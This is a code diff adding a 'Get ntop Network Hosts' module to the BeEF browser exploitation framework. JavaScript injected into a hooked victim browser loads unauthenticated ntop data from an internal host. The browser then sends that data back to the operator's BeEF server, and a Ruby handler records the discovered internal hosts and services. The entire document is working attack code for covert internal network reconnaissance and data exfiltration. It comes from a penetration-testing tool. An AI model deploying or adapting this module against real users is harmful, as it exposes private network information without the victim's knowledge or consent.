Add Get ntop Network Hosts module

modules/network/get_ntop_network_hosts/command.js

@@ -0,0 +1,35 @@
+//
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var rhost = '<%= @rhost %>';
+  var rport = '<%= @rport %>';
+
+  load_script = function(url) {
+    beef.debug("[Get ntop Network Hosts] Loading: " + url);
+    var s = document.createElement("script");
+    s.type = 'text/javascript';
+    s.src  = url;
+    document.body.appendChild(s);
+  }
+
+  read_ntop = function() {
+    try {
+      var result = JSON.stringify(ntopDict);
+      beef.debug("[Get ntop Network Hosts] Success: Found ntop data (" + result.length + ' bytes)');
+      beef.net.send("<%= @command_url %>", <%= @command_id %>, "proto=http&ip=<%= @rhost %>&port=<%= @rport %>&data="+result, beef.are.status_success());
+    } catch(e) {
+      beef.debug("[Get ntop Network Hosts] Error: Did not find ntop");
+      beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result=did not find ntop', beef.are.status_error());
+      return;
+    }
+  }
+
+  load_script("http://"+rhost+":"+rport+"/dumpData.html?language=python&view=long");
+  setTimeout("read_ntop()", 10000);
+
+});
+

modules/network/get_ntop_network_hosts/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        get_ntop_network_hosts:
+            enable: true
+            category: "Network"
+            name: "Get ntop Network Hosts"
+            description: "This module retrieves network information from ntop (unauthenticated).<br/>Tested on ntop v.5.0.1 on Ubuntu and v.5.0 Fedora RPM. This module does not work for ntop-ng."
+            authors: ["bcoles"]
+            target:
+                working: ["ALL"]

modules/network/get_ntop_network_hosts/module.rb

@@ -0,0 +1,42 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Get_ntop_network_hosts < BeEF::Core::Command
+
+  def self.options
+    return [
+      { 'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '127.0.0.1' },
+      { 'name' => 'rport', 'ui_label' => 'Remote Port', 'value' => '3000' }
+    ]
+  end
+
+  def post_execute
+    save({'result' => @datastore['result']})
+
+    configuration = BeEF::Core::Configuration.instance
+    if configuration.get("beef.extension.network.enable") == true
+      if @datastore['results'] =~ /^proto=(https?)&ip=([\d\.]+)&port=([\d]+)&data=(.+)\z/
+        proto = $1
+        ip = $2
+        port = $3
+        data = $4
+        session_id = @datastore['beefhook']
+        type = 'ntop'
+        if BeEF::Filters.is_valid_ip?(ip)
+          print_debug("Hooked browser found 'ntop' [proto: #{proto}, ip: #{ip}, port: #{port}]")
+          BeEF::Core::Models::NetworkService.add(:hooked_browser_id => session_id, :proto => proto, :ip => ip, :port => port, :type => type)
+        end
+        data.to_s.scan(/"hostNumIpAddress":"([\d\.]+)"/).flatten.each do |ip|
+          if BeEF::Filters.is_valid_ip?(ip)
+            print_debug("Hooked browser found host #{ip}")
+            BeEF::Core::Models::NetworkHost.add(:hooked_browser_id => session_id, :ip => ip, :port => port)
+          end
+        end
+      end
+    end
+  end
+
+end
+